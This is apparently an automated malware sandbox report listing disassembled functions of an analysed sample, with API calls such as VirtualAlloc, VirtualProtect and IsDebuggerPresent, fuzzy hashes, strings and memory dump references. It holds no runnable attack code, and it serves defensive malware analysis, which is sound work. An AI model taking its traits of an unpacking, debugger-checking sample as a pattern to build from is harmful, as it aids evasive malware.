Opcode ID: 837c5badca52079ec0e96daf541c87dc0ef9436bda13a7ae4c3dc574fe641105
Instruction ID: 187fe060aa1e8d20f7c285edf778d9c31c5832d5f6b45f70cdd0d571444a2247
Opcode Fuzzy Hash: 837c5badca52079ec0e96daf541c87dc0ef9436bda13a7ae4c3dc574fe641105
Instruction Fuzzy Hash: 4B5139B1A00225ABCB10EF66EC419AB77B8EF45724F90026FE814D3291E7389E51DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00428655, Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 0042866B
GetLastError.KERNEL32(?,?,?), ref: 00428675
__dosmaperr.LIBCMT ref: 0042867C
SetFilePointerEx.KERNELBASE(?,?,?,?,?), ref: 0042869A
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 004286C0

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: a521d9f6742f3aa34d8bfcce81540817ec3c156cb2d6ad036f264ceac9dbabdf
Instruction ID: c2bc2b43e9e0479d0445dc68446aaf02f36d205810b47e9c5fd17d7b8eea3b8e
Opcode Fuzzy Hash: a521d9f6742f3aa34d8bfcce81540817ec3c156cb2d6ad036f264ceac9dbabdf
Instruction Fuzzy Hash: 3A018071A01128BBCF109FA5DC089EF7F79EF45764F50815AF824921A0DB748940DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00427610, Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00426DA5: GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00426DED

WriteFile.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,f!@,?,?,?,?,?,?,?), ref: 00427761
GetLastError.KERNEL32 ref: 0042776B
__dosmaperr.LIBCMT ref: 004277B0

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID:
API String ID: 251514795-0
Opcode ID: e9298722f791c8e300b6e4d570100bb42cc1ecd925c3c94bca1732c60efa96f6
Instruction ID: 6189e57fbb4c9ae1907a91c154d3bdfe7dd40b0cdefc24b2e94fcbcc77c2c63b
Opcode Fuzzy Hash: e9298722f791c8e300b6e4d570100bb42cc1ecd925c3c94bca1732c60efa96f6
Instruction Fuzzy Hash: 6251F571B0822AABDB10DFA9EC81FEFBBB8EF45314F940057E400A7251D678A941C769

Uniqueness

Uniqueness Score: -1.00%

Function 00414D60, Relevance: 4.6, APIs: 3, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892d29c50a969a5db017f52e26b5cfadb566b14b83aaed2a0d3c3de2b0ca430a
Instruction ID: bd4005785fc9dca87dab10419669b9a423434038f5e1b53740f9e95500615ff8
Opcode Fuzzy Hash: 892d29c50a969a5db017f52e26b5cfadb566b14b83aaed2a0d3c3de2b0ca430a
Instruction Fuzzy Hash: 0F21B1B4200B019BEB30AF69E904797B7F8BF85705F04442EE98597790D7BDE884CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042A0AD, Relevance: 4.6, APIs: 3, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042A120
_free.LIBCMT ref: 0042A176

Part of subcall function 00429F52: _free.LIBCMT ref: 00429FAA
Part of subcall function 00429F52: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00437808), ref: 00429FBC

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 9fa3b6bd56bcebca6133c709ace5de1d6669b6461d28ef68dd2226c870d8b583
Instruction ID: 45cf62bc884d15c2c0a88a936c9aed1d857d16d728b95280dfeca9c4df0279c5
Opcode Fuzzy Hash: 9fa3b6bd56bcebca6133c709ace5de1d6669b6461d28ef68dd2226c870d8b583
Instruction Fuzzy Hash: 51212C72A0023457CB31A735AC41AFB7768CF45774F91039BFC94A2180DB789DA1859D

Uniqueness

Uniqueness Score: -1.00%

Function 00424D2B, Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,00000001,?,00424C59,00000001,00440BF8,0000000C,00424D0B,00000000), ref: 00424D81
GetLastError.KERNEL32(?,00424C59,00000001,00440BF8,0000000C,00424D0B,00000000), ref: 00424D8B
__dosmaperr.LIBCMT ref: 00424DB6

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: f5aaae65f62a1d01c280413904a2b3a292bf0e65c5b21665d18ac0ba5820f9a4
Instruction ID: cf6fecfc172579e245fbc089cf7535c755e8b7aec302f0c5f833c65d4f2fd194
Opcode Fuzzy Hash: f5aaae65f62a1d01c280413904a2b3a292bf0e65c5b21665d18ac0ba5820f9a4
Instruction Fuzzy Hash: 3F01263375413016D6252775B88977F674ACFC2B39FA5026FF814DB2D2DA6C8C81429D

Uniqueness

Uniqueness Score: -1.00%

Function 004285D9, Relevance: 4.5, APIs: 3, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,00000000,00000000,?,00000000,?,?,?,00428713,00000000,?,00000002,00000000), ref: 00428612
GetLastError.KERNEL32(?,00428713,00000000,?,00000002,00000000,?,00427699,00000000,00000000,00000000,00000002,?,00000000,00000000,f!@), ref: 0042861C
__dosmaperr.LIBCMT ref: 00428623

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: f5a94498c40215ac0ff3613faf8605a1c96022a0bf4522c1e8626f3b665c62c9
Instruction ID: eb3c294a95e674874e513fdcb742fe1e8bc9f71fec3bc1df61991faa30bdd700
Opcode Fuzzy Hash: f5a94498c40215ac0ff3613faf8605a1c96022a0bf4522c1e8626f3b665c62c9
Instruction Fuzzy Hash: 0F01F732710525BFCF159FA9EC059AE3B29EF86325B64420EF811DB2D0EE74DD418B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042B8BD, Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0042B8C1
_free.LIBCMT ref: 0042B8FA
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042B901

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: 5d7be9edb3ce8c665922d8726c8e17989f02d0503b0f132c07fc03fa579451c7
Instruction ID: a86557282dffd8078d4fc8eb4d360000b08f910171242b477acc9820827bb8b3
Opcode Fuzzy Hash: 5d7be9edb3ce8c665922d8726c8e17989f02d0503b0f132c07fc03fa579451c7
Instruction Fuzzy Hash: 15E02B37744E3226921132363C89EAF0B1DCFC27B57A5012BF42882281EF585C0201FD

Uniqueness

Uniqueness Score: -1.00%

Function 00414B60, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00414C53

Strings

F7hu3e88u8dw83ytskjgtxfkb9HJkwjdijWJ, xrefs: 00414BF5

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: F7hu3e88u8dw83ytskjgtxfkb9HJkwjdijWJ
API String ID: 823142352-2733386146
Opcode ID: d40c6c6160221197c2edcf7d929eb591da28f556b5286438da0060ee1f063cd2
Instruction ID: f9c7e2d7843b14380df3a8aaa82790d69693ece0fb5a2b0611c17a93f1d9f99c
Opcode Fuzzy Hash: d40c6c6160221197c2edcf7d929eb591da28f556b5286438da0060ee1f063cd2
Instruction Fuzzy Hash: 07418EB05017409FE7308F15D809757BBF0BF41718F118A6EE5999BBC1E3BAE4888B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042695B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

__cftof.LIBCMT ref: 00426A31

Strings

f!@, xrefs: 0042696D

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __cftof
String ID: f!@
API String ID: 1622813385-1230519027
Opcode ID: 11b0959a5c1825e24ff45d522ab410245ef670c5136a5528f041441a8d352b09
Instruction ID: 55d67722fdbbb44a91f54f996a132253f85e0b0de065ada2076dc141130299f8
Opcode Fuzzy Hash: 11b0959a5c1825e24ff45d522ab410245ef670c5136a5528f041441a8d352b09
Instruction Fuzzy Hash: D93126327001346ACB196B35BC4297E7768DE87B387E5421FF420AA1D1EE3CD8838648

Uniqueness

Uniqueness Score: -1.00%

Function 004493F0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(016BB61C,016C3BD0,00000040,?), ref: 004494E1

Strings

@, xrefs: 00449430

Memory Dump Source

Source File: 00000000.00000002.929630304.0000000000448000.00000020.00020000.sdmp, Offset: 00448000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_448000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 70111ec3d2be513c42b32507ca7103b3e668a1abea644ecffb375fddbece0862
Instruction ID: dfb499618e0e907b321165385a30e4022f6f12c65d80d580572653a55f174e65
Opcode Fuzzy Hash: 70111ec3d2be513c42b32507ca7103b3e668a1abea644ecffb375fddbece0862
Instruction Fuzzy Hash: E1214F28108BC09ED312C77CBD7867A3FB56326207FD846A8D09C5B2B7D6B99118C76D

Uniqueness

Uniqueness Score: -1.00%

Function 00403100, Relevance: 3.1, APIs: 2, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

SHFileOperationW.SHELL32(00000654), ref: 004031D2
Sleep.KERNEL32(00000004), ref: 004031DA

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileOperationSleep
String ID:
API String ID: 2384180321-0
Opcode ID: f746b3391fd1bf2cd28f22d5e5f924014e759b97af1b1b9a09e9a10a57efe134
Instruction ID: 503749f49511a8afcda0956dfd5a54d2c4b48143094f2c20a80699bc23a40190
Opcode Fuzzy Hash: f746b3391fd1bf2cd28f22d5e5f924014e759b97af1b1b9a09e9a10a57efe134
Instruction Fuzzy Hash: DE41E4B01043819BC724DF24C985B9FB7F5BFC4309F508A1DE58887295EB39E288CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00427303, Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,00427725,?,00000000,00000000,?,?,00000000), ref: 004273AD
GetLastError.KERNEL32(?,00427725,?,00000000,00000000,?,?,00000000,00000000,f!@,?,?,?,?,?,?), ref: 004273D3

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: bca6154416014b3a818265f899c9fa0d550aee66259bac30b92aa8ff594c38ff
Instruction ID: 785da2d35afd5fe3bf473d19b3202920e2ab7b212c0abf5ea69192dbd398e0a2
Opcode Fuzzy Hash: bca6154416014b3a818265f899c9fa0d550aee66259bac30b92aa8ff594c38ff
Instruction Fuzzy Hash: 4F21A231B042289BCB24CF19DD809EEB3F9EF49315F5445AAED09E7250D734DE81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 00427228, Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,00427745,?,00000000,00000000,?,?,00000000), ref: 004272C4
GetLastError.KERNEL32(?,00427745,?,00000000,00000000,?,?,00000000,00000000,f!@,?,?,?,?,?,?), ref: 004272EA

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 5b97eedbd14d85000398893579e35539ad1e880a6e4a33145a871d83f955b2fe
Instruction ID: e789b379b24f38082f68ed5bf1a785663b83dc525726c0a10ec9f063bbff655a
Opcode Fuzzy Hash: 5b97eedbd14d85000398893579e35539ad1e880a6e4a33145a871d83f955b2fe
Instruction Fuzzy Hash: A921A034A00229DBCB19CF69DD80AEDB7B9EB4D305F5440AAE906D7211D6349E42CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403290, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

-, xrefs: 004032A3

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 7e523f30212ca871ea59efae5cef7f5cdc355d3c65524451d040bf20baea22ae
Instruction ID: 7b4837cb07872001d1fe4437078ae5f4ed8b268f4654edfe8db0bbd554c14429
Opcode Fuzzy Hash: 7e523f30212ca871ea59efae5cef7f5cdc355d3c65524451d040bf20baea22ae
Instruction Fuzzy Hash: 95110AF0D4434467E311EF255C86F5B3A9D9B85708F04043EFD45A3382EA7DE94882AB

Uniqueness

Uniqueness Score: -1.00%

Function 004025F0, Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

GdipDisposeImage.GDIPLUS(?), ref: 004025FC
GdipFree.GDIPLUS ref: 0040260F

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Gdip$DisposeFreeImage
String ID:
API String ID: 1950503971-0
Opcode ID: 1ebad81db86a079ca83848a38f407bfd413141559dbed38acdb0258a5ef6856a
Instruction ID: a593295bd730f55fa88b79d9a7d081ec5e2d597b060236e4f6f043a62d27f7b7
Opcode Fuzzy Hash: 1ebad81db86a079ca83848a38f407bfd413141559dbed38acdb0258a5ef6856a
Instruction Fuzzy Hash: B6E0C23530192057C6211B08FE08ACBB7D49F29759F044C3BF980B2390C3B69C528BED

Uniqueness

Uniqueness Score: -1.00%

Function 0041D491, Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea0a6d5229f9a29143a20dcf19732efa94f98388614fa6db1a76a1680d22abf
Instruction ID: 3ef88647bf0aa0466637d303d923cfad419d5bad590c8e91ec8f1420c65049f0
Opcode Fuzzy Hash: fea0a6d5229f9a29143a20dcf19732efa94f98388614fa6db1a76a1680d22abf
Instruction Fuzzy Hash: 2841F8B0F00118AFDB10DF58C841AEA7BA2AF89358F24816EF4099B351D775DD82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00413BF0, Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000003,00000000,00414659,00000000,00000097,00000000,00000003,00000003,00414659,00000097,00004000), ref: 00413C69

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 45728a6a99d8bd0e54b28bbace65369d3e4575681ab9710159f3d5201e7f823d
Instruction ID: 64a35d2d35e8983b5461b7fddd4b7c477298c94a280978fd147c73891e7d2025
Opcode Fuzzy Hash: 45728a6a99d8bd0e54b28bbace65369d3e4575681ab9710159f3d5201e7f823d
Instruction Fuzzy Hash: 87119D72704602AFE704DE26D8C4A97F7A8FB94729F20852EF55593600EB30EC65CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004281E2, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0042821C

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 8086dca53eed77ec445f247d065570d3185db74af83228924b8cf8a0051c0b4b
Instruction ID: 69a1602558238e151ffad6b1f0febb3363f5514e86906c47ff362ba4943103dd
Opcode Fuzzy Hash: 8086dca53eed77ec445f247d065570d3185db74af83228924b8cf8a0051c0b4b
Instruction Fuzzy Hash: 1C112771A0421AAFCF05DF58E94199F7BF4EF48304F1540AAF809EB351DA30EA11CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00419C34, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec935d791f12daeffed6ca71ad7b371f85261c090978bed10bd1a8f9c98fe9cc
Instruction ID: 38d1798c7c4b45791e9bc66fe1daebc3070d261c9ba4dfeb1b0f682729783485
Opcode Fuzzy Hash: ec935d791f12daeffed6ca71ad7b371f85261c090978bed10bd1a8f9c98fe9cc
Instruction Fuzzy Hash: FDF0867260162456D6212A6AAD11BDA22D88F91339F51071FF8A4D31D1EA7CE8428AEE

Uniqueness

Uniqueness Score: -1.00%

Function 019D81AE, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 019D81F6

Memory Dump Source

Source File: 00000000.00000002.929883180.00000000019D7000.00000040.00000001.sdmp, Offset: 019D7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19d7000_file.jbxd

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 5f8c1689466cf8a362810f809fb5eb45519dd03fe592817e996a6f0cfd399a8a
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 1AF096315007116BE7213BF9988CF6FB6ECBF49665F104528E65AD14C1DB70E8494A61

Uniqueness

Uniqueness Score: -1.00%

Function 00425373, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00416318,004021DA,?,0041732F,004021DC,004021DA,?,f!@,?,00416242,00416318,004021DE,004021DA,004021DA,004021DA), ref: 004253A5

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d054ca1564cea1932355ddb4cf383b7f615155863817540b2c0aedf81d0218a2
Instruction ID: c5023009572780af115b4a288d79ee7e605764c9a009f6b5afbb3585be84856d
Opcode Fuzzy Hash: d054ca1564cea1932355ddb4cf383b7f615155863817540b2c0aedf81d0218a2
Instruction Fuzzy Hash: 66E0ED31302A35A7DB31A766BC05B5F76889B413E4FD12123EC05D6290CBFCDC4081AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042F80A, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0042FB6C,?,?,00000000,?,0042FB6C,00000000,0000000C), ref: 0042F827

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 33a3a6bf65b0ef3d5d3f4036c0f9f9d0bb9ca62f2daaed945ad9faf4e247c3d8
Instruction ID: 02e237c5fdf5e7a72de8209e8ba17869ef4bed609ba47ff4101f7f3e5ba8f571
Opcode Fuzzy Hash: 33a3a6bf65b0ef3d5d3f4036c0f9f9d0bb9ca62f2daaed945ad9faf4e247c3d8
Instruction Fuzzy Hash: 43D06C3200020DBBDF028F84DD06EDA3BBAFB48715F014050BA185A060C732E821AB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1C2, Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041D1D5

Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: dd227cadd09729b7694e5ce878f0d6dd5ce280f23aeb08eccb962174fcda62ac
Instruction ID: 67059ac2bfaca528a66e318dab88585f3f4dc5ee76f7ea23b5e1c2f38f2ae38f
Opcode Fuzzy Hash: dd227cadd09729b7694e5ce878f0d6dd5ce280f23aeb08eccb962174fcda62ac
Instruction Fuzzy Hash: 75C08C3110020CFBCF009B42D806F4E7FA8DB80368F600088F41057240CAB1EE009680

Uniqueness

Uniqueness Score: -1.00%

Function 019D7E6D, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 019D7EBE

Memory Dump Source

Source File: 00000000.00000002.929883180.00000000019D7000.00000040.00000001.sdmp, Offset: 019D7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19d7000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 2ccfb7a860f160206ab7749b15fa2a4a4207539a8bbdde0fb88d4f48759a9bee
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 72112B79A00208EFDB01DF98C985E99BBF5AF08351F05C094F9489B362D771EA50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 004493D0, Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,016C3BD0), ref: 004493DB

Memory Dump Source

Source File: 00000000.00000002.929630304.0000000000448000.00000020.00020000.sdmp, Offset: 00448000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_448000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: b0f6f88cb3d997f452aa78b764bbf1b821d51529428f674f7435ecd67f0b75a8
Instruction ID: d138825e958eef540703c836628a67ad5e2b911ac39aef1c7c85622753beed03
Opcode Fuzzy Hash: b0f6f88cb3d997f452aa78b764bbf1b821d51529428f674f7435ecd67f0b75a8
Instruction Fuzzy Hash: A5C09B751483145FD3109BD5FC45B35379CF304711F449015F94CC6754F67068504F55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042DAF1, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0042DC6C

Strings

1#SNAN, xrefs: 0042EE03
1#IND, xrefs: 0042EDFC
1#INF, xrefs: 0042EE27
1#QNAN, xrefs: 0042EE0A

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 784f5ee4e1825bd117dcf5262b5596a2cf0ce2a5eb9cfca1cf5357854f0cde77
Instruction ID: c8644981ff58625deab077397ef3a83461afa27c56065f4bec1578bd5624ce57
Opcode Fuzzy Hash: 784f5ee4e1825bd117dcf5262b5596a2cf0ce2a5eb9cfca1cf5357854f0cde77
Instruction Fuzzy Hash: CEC23971E046388BDB24CE29ED407EAB7B5EB49304F9541EBD84DE7240E778AE818F45

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1DD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,f!@), ref: 0041D2D5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,f!@), ref: 0041D2DF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,f!@), ref: 0041D2EC

Strings

f!@, xrefs: 0041D1F6

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: f!@
API String ID: 3906539128-1230519027
Opcode ID: a3c60bb57505c20cddecf0e9eef7da80713cafcac41bb38ee95cd197495e05fa
Instruction ID: 49a7087f40e6b38d03ea6d539442bf6e5d8e261bebe98e8b95fa0d88050ed8bb
Opcode Fuzzy Hash: a3c60bb57505c20cddecf0e9eef7da80713cafcac41bb38ee95cd197495e05fa
Instruction Fuzzy Hash: F031D2B4D01228ABCB21DF24D989BCDBBB8AF08310F5041EAE41CA6250E7749BC18F48

Uniqueness

Uniqueness Score: -1.00%

Function 00411A10, Relevance: 5.3, Strings: 4, Instructions: 330COMMON

Download Yara Rule

Strings

too many codes, xrefs: 00411DAF
not enough codes, xrefs: 00411D93
bad compressed size, xrefs: 00411E75
output buffer too small for in-memory compression, xrefs: 00411CE7

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: bad compressed size$not enough codes$output buffer too small for in-memory compression$too many codes
API String ID: 0-1974362290
Opcode ID: c6bd5adc19e14c474e418e2db97026603a5d5e64daee1f1162832f2fd3f105cb
